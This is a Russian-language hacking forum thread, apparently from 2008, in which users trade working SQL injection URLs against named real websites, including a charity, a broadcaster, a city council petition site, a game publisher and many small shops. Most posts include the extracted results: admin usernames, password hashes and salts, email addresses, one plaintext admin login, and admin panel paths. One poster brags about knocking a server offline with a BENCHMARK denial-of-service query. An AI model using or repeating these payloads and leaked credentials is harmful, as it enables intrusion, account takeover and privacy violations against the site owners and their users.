SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Заходим в шоп...покупаем че-нить =\
     
    3 people like this.
  2. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    wwf.or.id - инданезийское представительство Всемирного фонда дикой природы
    (Есть прикольный такой лэйбл с пандой!)
    Code:
    http://www.wwf.or.id/tessonilo/Default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15/*&wwf_lang=1
    5.0.37:wwfdb:wwfid@localhost
     
    2 people like this.
  3. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    Yadro banner network
    Code:
    http://web.yadro.ru/vbnstat.php3?vbnum=2+and+1=if(ascii((select+version())=0x34),1,0)--
    версия mysql 4
    // вообще в запросе 12 полей и отлично проходит запрос вида ?vbnum=-2+UniOn+selEct+1,2,3,4,5,6,7,8,9,0,1,2--
    но, нормально раскрутить не получилось, как цель себе не ставил
    ======================
    SecurIT — защита информации, информационная безопасность /Программы Zlock, Zserver.../
    Code:
    http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,0,1--
    5.0.45-log:[email protected]:u17160

    Code:
    http://www.securit.ru/press/news/?id=-63+uNioN+selEct+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,0,1+from+information_schema.columns+where+column_name=0x70617373776f7264+limit+0,1--
    u17160:USERS:pASSWORD
     
    #4683 big_BRAT, 7 Feb 2008
    Last edited: 7 Feb 2008
    4 people like this.
  4. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    http://www.purelyalpaca.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://shop.dipngrip.com/customer_testimonials.php?testimonial_id=99999+union+sele ct+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/
    *
    http://www.wi-gear.com/customer_testimonials.php?testimonial_id=99999+union+sel ect+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.stoneycreekshop.co.nz/customer_testimonials.php?testimonial_id=99999+union+sele
    ct+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.littlepinkshop.com/shop/customer_testimonials.php?testimonial_id=99999+unio n+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.genesissurfshop.com/shop/customer_testimonials.php?testimonial_id=99999+union+se
    lect+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.jaxteas.com/customer_testimonials.php?testimonial_id=99999+unio
    n+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
     
    3 people like this.
  5. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    http://www.bulgarianbasket.com/

    HTML:
    http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
    4.0.24_Debian-9:[email protected]: DB10614
    (поле вывода в заголовке страницы)

    HTML:
    http://www.bulgarianbasket.com/bg/news2.php?id=-11863'+UNION+SELECT+concat_ws(0x3a,username,userpass)+FROM+user/*
    vladi:7605f18a510a03c7::vladi


    http://www.hpol.org/

    HTML:
    http://www.hpol.org/transcript.php?id=-72+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
    5.0.27:ro@localhost:hpol


    http://www.cbc.ca/

    HTML:
    http://www.cbc.ca/thehour/video.php?id=-1073+UNION+SELECT+null,null,null,version(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/
    PostgreSQL 7.4.17 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.3 (SuSE Linux)
    (здесь мне пришлось помучаться :D )
     
    5 people like this.
  6. nex0

    nex0 Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    52
    Likes Received:
    83
    Reputations:
    6
    metallica.ru
    Code:
    http://www.metallica.ru/bbs.php3?id=999999999+union+select+convert(concat(version(),%22:%22,user(),%22:%22,database()),binary)/*
    version() 4.1.16
    user() acillatem@localhost
    database() meta2000

    iso-9001.ru
    Code:
    http://www.iso-9001.ru/index.php3?id=146+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9
    version() 4.1.22
    user() so_user@localhost
    database() iso_9001

    pricenews.dp.ua

    Code:
    http://www.pricenews.dp.ua/predpr.php3?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1999,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
    version() 5.0.27
    user() dprice@localhost
    database() price

    http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version(),5,6,7,8,9/*
    infon.ru :D
    Code:
    http://www.infon.ru/notice.phtml?nid=99999+union+select+1,convert((concat(version(),0x3a,user(),0x3a,database())),binary)
    version() 4.1.12
    user() portal_manjet@localhost
    database() portal_manjet

    sosna.ru
    Code:
    http://www.sosna.ru/index.phtml?nid=99999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6/*
    version() 5.0.45-log
    user() [email protected]
    database() u71952_sosna_ru

    vogss.ru
    Code:
    www.vogss.ru/print.phtml?nid=999+union+select+1,2,3/*
    version() 4.1.22-log
    user() vogss@localhost
    database() vogss

    elitwater.ru

    Code:
    http://www.elitwater.ru/index.phtml?pid=99999+union+select+1,2,3,version(),5,6,7,8,9/*
    version() 5.0.22
    user() elitwater@localhost
    database() elitwater
     
    4 people like this.
  7. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    gov?!

    http://epetitions.bristol.gov.uk/

    HTML:
    http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
    5.0.44-log:epetitioner_user@localhost:bristol_epetitioner

    HTML:
    http://epetitions.bristol.gov.uk/petition.php?id=161+UNION+SELECT+1,concat_ws(0x3a,id,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14+FROM+usertemp/*
    1:mcheverton: password:[email protected]
    (http://epetitions.bristol.gov.uk/)


    http://www.pjn.gov.ar/

    HTML:
    http://www.pjn.gov.ar/getobj.php?id=-25722+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*
    5.0.38-Ubuntu_0ubuntu1-log: [email protected]:webpjn
     
    #4687 ~EviL~, 7 Feb 2008
    Last edited: 8 Feb 2008
    2 people like this.
  8. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    intersoft.pl
    Code:
    http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user(),database()),3,4,5+from+mysql.user/*
    5.0.22-community-nt[email protected]intersoft
    Code:
    http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,version(),user(),database()),3,4,5+from+mysql.user/*
    root74ecc53c5b07539b
    admin56e5812a73345d40
    cms4c6676a15e990b3c
    sklep7e3186c51e422e57
    ankieta28583f5150f129bc
    forum0c87462e7823e478
    arcadia465e2df62544abdd

    Code:
    http://www.intersoft.pl/index.php?link_id=1&lvl=1&p=31+UNION+SELECT+1,concat_ws(0x3,id,user,pass,imie,nazwisko),3,4,5+from+admins/*
    1adminjch123JaroslawChudzik
    Админка: http://www.intersoft.pl/admin/
     
    4 people like this.
  9. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    http://specserver.com/rus/notice.asp?groupID=1+or+1=@@version--
     
    1 person likes this.
  10. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    www.lanbilling.ru
    LANBilling биллинговая система
    Code:
    http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
    5.0.26:[email protected]:lb_download
    Code:
    http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables+limit+0,1/*
    интересные таблицы(поля):
    pafiledb_admin(admin_id,admin_username,admin_password,admin_email)
    pafiledb_license(license_id,license_name,license_text)

    1:Admin:f41b01afce262acf56b0f89b6c88b732

    ===============================
    только что просмотрел исходник страницы оказывается это paFileDB 3.0. и на securitylab не нашёл инфы о такой иньекции, :D это потянет на новость?)))
    ----------------
    поставил последнюю версию paFileDB, фишка не работает, уже стоит intval()
     
    #4690 big_BRAT, 8 Feb 2008
    Last edited: 8 Feb 2008
    1 person likes this.
  11. Holokost

    Holokost Member

    Joined:
    9 Nov 2007
    Messages:
    8
    Likes Received:
    5
    Reputations:
    0
    http://www.c-ib.ru/content.php?txt=-7%20union%20select%201,2,version(),user()/*
     
    2 people like this.
  12. CraZee

    CraZee Member

    Joined:
    27 Mar 2007
    Messages:
    1
    Likes Received:
    7
    Reputations:
    -5
    Уязвяшки:

    Code:
    http://www.redglobe.de/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    Redaktion:d0d67fa9e0a04b037ad308c952ac0f19:2oXYS0TysfDNgY1O

    Bayern:157a8efa7606d16829d690677b9f7e73:hFN6dzgN7mw528lX
    Komsomolze:e0b6b71e0f20a8d562fa04d1858298c5:YooDNSKSxbF7nLNf
    Sirdon:c1f95d2d9f01c205776d9e4756ee1401
    Vera:285a81de436e1b964fe95255e48c76ea

    ----------------------------
    Code:
    http://www.gsv1.de/gsv_joomla/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
    admin:8c30df2b67d3120cb38725b59a8a12b0:FTwfwq9zdpCoVVaRvxxO4h6PKIAD0AY7
     
    4 people like this.
  13. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    masarykovazs.eu
    Code:
    http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11/*
    masarykovazs.eu@localhost:5.0.38-Debian_1-log:masarykovazs_eu
    Code:
    http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11+from+info   rmation_schema.tables/*
    Code:
    http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11+from+inf   ormation_schema.columns/*
    visit-palawan.com
    Code:
    http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(USER   (),0x3a,VERSION(),0x3a,DATABASE())/*
    Code:
    http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(tabl   e_name)+from+information_schema.tables/*
    Code:
    http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,column_name   +from+information_schema.columns/*
    sitedefteri.com
    Code:
    http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DAT   ABASE()),5,6,7,8,9,10,11,12,13,14,15/*
    root@localhost:5.0.32-Debian_7etch3-log:linkdefteri
    Code:
    http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,1   5+from+information_schema.tables/*
    Code:
    http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,   15+from+information_schema.columns/*
    toy-icti.org
    Code:
    http://www.toy-icti.org/newsletter/index.php?NID=299999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a   ,DATABASE()),3/*
    seekwell@localhost:4.0.22-Max:SWicti-06
     
    3 people like this.
  14. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    5.0.32-Debian_7etch5-log
    Админы форума:
    Admin:6689263e6df1fbd89377d1dac02f87b0:125040
    Stan:0057f84026c20b2a4cdeaf15824773bb:arowana
    -----------------------------------------------------
    5.0.45-log
    admin:5569aeb9a91a05eac4bb0186116e44c7
     
    4 people like this.
  15. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    энто боян,попробуй найти инъекцию на другом сайте в домене .mil ;) :D
     
    3 people like this.
  16. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    arimel:88589699a8524d14a7fafc60a18f7644:[email protected]

    Путь к админке http://www.cristianos.com/wp-login.php
    login arimel
    pass anika@99

    Кажется прально все оформил) просто первый раз в этом разделе) так что не пинайте :) , если что скажите исправлюсь ; )
     
    2 people like this.
  17. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    HTML:
    http://kaleydoskop.com.ua/index.php?plugin=katalog&do=showUserContent&type=firms&id=index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
    11::administrator::070670bb5da95b97f378e4b1a5a954da::[email protected]

    HTML:
    http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
    12::admin::670266c7724d26d023f1326f1020e919::[email protected]
    11::administrator::670266c7724d26d023f1326fb070c1d0::[email protected]
     
    1 person likes this.
  18. nex0

    nex0 Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    52
    Likes Received:
    83
    Reputations:
    6
    порция скулей

    activision2007.es (сайт испаского Activision)
    Code:
    http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
    version() 4.1.18-nt :mad: :mad: :mad:
    user() DBActivision27@localhost
    database() gestion

    табла usuario ~75000 юзеров!!! (узнал лимитом)
    с трудом нашел колонки id, nombre, email......
    Code:
    http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,3,convert(concat(id,0x3a,nombre,0x3a,email),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+usuario+limit+0,100000
    колонку с пассами мне не удалось найти=// так что пробуйте
    p.s.потом я разозлился и отправил сервер bеnchmаrk'ом в глубокий DoS/ (часов 5 уже не работает)

    ardana.ru
    Code:
    http://www.ardana.ru/products/product.php?gid=-1+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    version() 4.1.22-standard
    user() ardana_ardana@localhost
    database() ardana_ardana

    otvet.su
    Code:
    http://www.otvet.su/tovar.php?gid=999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    version() 5.0.24-standard
    user() otvet1@localhost
    database() db_otvet1

    abandoneer.com
    Code:
    http://abandoneer.com/games.php?gameid=99999999/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    version() 4.1.21-log
    user() evilrafael@localhost
    database() evilrafael
     
    1 person likes this.
  19. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Code:
    http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11users%20id::login::pwd::email
    4.1.20::sahm_user1@localhost::sahm_db


    Code:
    http://www.dharmahealing.org/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
    supercristal:bdbfdaa664e59fd3f2ef5a51f0688e10


    Code:
    http://sacredaeon.com/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
    supercristal:e5fe262def0b72b051d9d11301cde9b9

    Code:
    http://www.torcidaforcajovem.net/index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
    admin:a1c3c4ff7c9a2064f788db3eb8a5fb49


    Code:
    http://www.xcsport.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    b983:6e321306ec723a50ee62d01f21638bb2f72e4592


    Code:
    http://www.rusquilt.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    7ae1:3dc58f7e1db2d269fadf0f519315f264db969552

    Терь второй раз попробуем, если хэши расшифрованными кидать тогда виноват, просто уже тут видел, что выложивали не расшифрованным (конечно я пробывал рсшифровать), еще раз попрошу чтоб не пинали если че не так) исправлюсь)
     
    #4699 CaNNabi$, 9 Feb 2008
    Last edited: 10 Feb 2008
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Эм... А почему именно конвертом ?(проверить хотел).Серв кстати уже живой:РР.

    http://www.activision2007.es/juego.php?jid=-125+BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date)))/* (Не получилось :Р).

    P.S. Чесн не знаю,куда постить =____=.Напостил сюда,ибо адресовано аффтару=_______=
     
    #4700 Велемир, 10 Feb 2008
    Last edited: 10 Feb 2008
Thread Status:
Not open for further replies.